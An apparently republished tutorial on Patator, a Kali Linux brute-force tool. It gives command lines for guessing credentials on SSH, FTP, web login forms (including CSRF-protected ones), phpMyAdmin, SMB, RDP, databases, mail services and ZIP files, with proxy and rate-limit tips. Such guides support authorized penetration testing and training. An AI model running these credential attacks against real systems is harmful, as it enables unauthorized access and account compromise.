BestHub
Sign in
Information Security 20 min read

Patator: A Versatile Password‑Cracking Toolkit for Kali Linux

Patator is a Python‑based brute‑force framework preinstalled in Kali Linux that offers precise success/failure filtering via its -x action system, supports over 36 modules for protocols such as SSH, FTP, HTTP, SMB, and provides advanced features like rate limiting, resume, encoding, and proxy support, making it a powerful alternative to tools like Hydra and Medusa.

Black & White Path
Black & White Path
Black & White Path
Patator: A Versatile Password‑Cracking Toolkit for Kali Linux

Installation & Startup

Patator is pre‑installed on Kali. Run patator -h to list modules. If missing, install with sudo apt install patator -y or build from source:

git clone https://github.com/lanjelot/patator.git
cd patator && python3 -m pip install -r requirements.txt

Available Modules

Patator ships with more than 36 modules, e.g. ftp_login, ssh_login, http_fuzz, smb_login, rdp_login, mysql_login, zipfile, dns_forward, …

Basic Usage

Modules accept parameters such as host, port, user, password, keyfile, etc. The generic syntax is:

patator <module> host=<target> user=FILE0 password=FILE1 0=<userlist> 1=<passlist>

SSH brute‑force example

patator ssh_login host=192.168.50.1 user=FILE0 password=FILE1 \
  0=/root/username.txt 1=/root/password.txt

Sample output shows the response code, size, time, candidate and message, e.g. 230 … Authentication successful. and 530 … Authentication failed. Filtering failed attempts:

patator ssh_login host=192.168.50.1 user=FILE0 password=FILE1 \
  0=/root/username.txt 1=/root/password.txt \
  -x ignore:mesg='Authentication failed.'

The -x Action System

Syntax:

-x <action>[,<action>...]:<condition>=<value>[,<condition>=<value>...]

Supported actions:

ignore – do not report the result.

retry – retry the payload (e.g., on timeout or HTTP 500).

reset – disconnect and reconnect (unstable connections).

skip – skip the current user/keyword (e.g., account locked).

free – skip the current password (e.g., password triggers lockout).

quit – abort the scan immediately (e.g., WAF block).

Supported conditions (matched against the response): code – status code (e.g., code=230 for successful SSH login). size – response size (e.g., size=0). time – response time (e.g., time=5- for >5 s). mesg – exact message match (e.g., mesg='Login incorrect.'). fgrep – fuzzy substring containment (e.g., fgrep='Cannot log in'). egrep – regular‑expression match (e.g., egrep='error|failed'). clen – Content‑Length (HTTP only, e.g., clen=0).

Multiple -x options can be combined, for example:

patator http_fuzz url=http://192.168.50.1/FILE0 0=paths.txt \
  -x ignore:code=404 \
  -x ignore,reset,retry:code=500

Module‑Specific Examples

FTP brute‑force (custom port)

patator ftp_login host=192.168.50.66 port=2121 user=FILE0 password=FILE1 \
  0=/root/username.txt 1=/root/password.txt \
  -x ignore:mesg='Login incorrect.'

Additional usages:

Anonymous login: patator ftp_login host=… user=anonymous password=anonymous Fixed user, enumerate passwords:

patator ftp_login host=… user=admin password=FILE0 -x ignore:fgrep='Login incorrect'

FTPS (TLS): add tls=1 Common FTP return codes: 230 – login successful; 530 – login failed; 500 – server error.

HTTP fuzz (web directory scan)

patator http_fuzz url=http://192.168.50.1/FILE0 \
  0=/usr/share/wordlists/dirb/common.txt \
  -x ignore:code=404

HTTP login form brute‑force

patator http_fuzz url=http://192.168.50.1/login.php \
  method=POST \
  body='username=admin&password=FILE0&submit=Login' \
  0=/root/passwords.txt \
  follow=1 accept_cookie=1 \
  -x ignore:fgrep='Login failed'

CSRF‑protected form

patator http_fuzz url=http://192.168.50.1/login.php \
  method=POST \
  body='csrf_token=TOKEN0&username=admin&password=FILE0' \
  0=/root/passwords.txt \
  before_urls=http://192.168.50.1/login.php \
  before_egrep='name="csrf_token" value="([^\"]+)"' \
  follow=1 accept_cookie=1 \
  -x ignore:fgrep='Invalid CSRF token' \
  -x ignore:fgrep='Login failed'

phpMyAdmin brute‑force

patator http_fuzz url=http://192.168.50.1/pma/index.php \
  method=POST \
  body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en' \
  0=/root/combos.txt \
  before_urls=http://192.168.50.1/pma/index.php \
  accept_cookie=1 follow=1 \
  -x ignore:fgrep='Cannot log in to the MySQL server'

HTTP Basic / NTLM authentication

# Basic auth
patator http_fuzz url=http://192.168.50.1/manager/html \
  user_pass=COMBO00:COMBO01 0=/root/combos.txt \
  -x ignore:code=401

# Custom Authorization header (Base64 encoding)
patator http_fuzz url=http://192.168.50.1/admin \
  header='Authorization: Basic _@@_FILE0_@@_' \
  0=/root/tokens.txt -e _@@_:b64 \
  -x ignore:code=401

Lateral‑movement modules

SMB –

patator smb_login … -x ignore:fgrep='unknown user name or bad password'

RDP (NLA only) – patator rdp_login … Database – MySQL, MSSQL, PostgreSQL, Oracle examples with appropriate -x ignore filters.

VNC – patator vnc_login … SNMP – community brute‑force (v1/v2c) and v3 user enumeration/password cracking with -x ignore conditions.

Email service brute‑force

POP3 (plain/SSL) – -x ignore:code=-ERR IMAP – -x ignore:code=NO SMTP VRFY – -x ignore:fgrep='252' SMTP RCPT TO –

-x ignore:fgrep='550'

ZIP password cracking

patator unzip_pass zipfile=/root/kali.zip password=FILE0 \
  0=/root/zi.txt -x ignore:code!=0

Successful output contains code=0. Similar modules exist for Java keystore ( keystore_pass) and SQLCipher ( sqlcipher_pass).

DNS enumeration

Forward lookup (sub‑domain enumeration) – ignore code=3 (NXDOMAIN). Reverse lookup (IP‑range scanning) – also ignore code=3 and optionally filter by domain.

IKE VPN scanning

patator ike_enum host=vpn.company.com \
  transform=MOD0 0=TRANS aggressive=RANGE1 1=int:0-1 \
  -x ignore:fgrep='NO-PROPOSAL'

Output reveals supported transforms such as 3DES, MD5, PSK.

Advanced Tips

Rate limiting – --rate-limit=1 for one request per second; -t 20 to set concurrency.

Resume scans – after Ctrl+C Patator prints a resume token; use --resume … to continue.

Encoding system – -e _@@_:b64, -e _@@_:url, etc., to transform dictionary values.

Result saving – -l /tmp/scan_results for full logs, --hits=/tmp/hits.txt for successful hits, --csv=/tmp/results.csv for CSV export.

Proxy support – proxy=127.0.0.1:8080 proxy_type=http or SOCKS5.

Patator vs. Hydra

Patator excels when precise success/failure control, CSRF token handling, breakpoint resume, or custom encoding is required.

Hydra offers the widest protocol coverage (e.g., Redis, MongoDB) and is suitable for simple brute‑force tasks.

Key Takeaways

Use -x (e.g., -x ignore:fgrep='…') to keep output clean.

Log detailed results with -l /tmp/xxx for troubleshooting.

High‑quality dictionaries (rockyou.txt, SecLists) are the decisive factor for success.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

Network SecurityPenetration TestingCommand-line ToolsBrute ForcePassword CrackingKali LinuxPatator
Black & White Path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment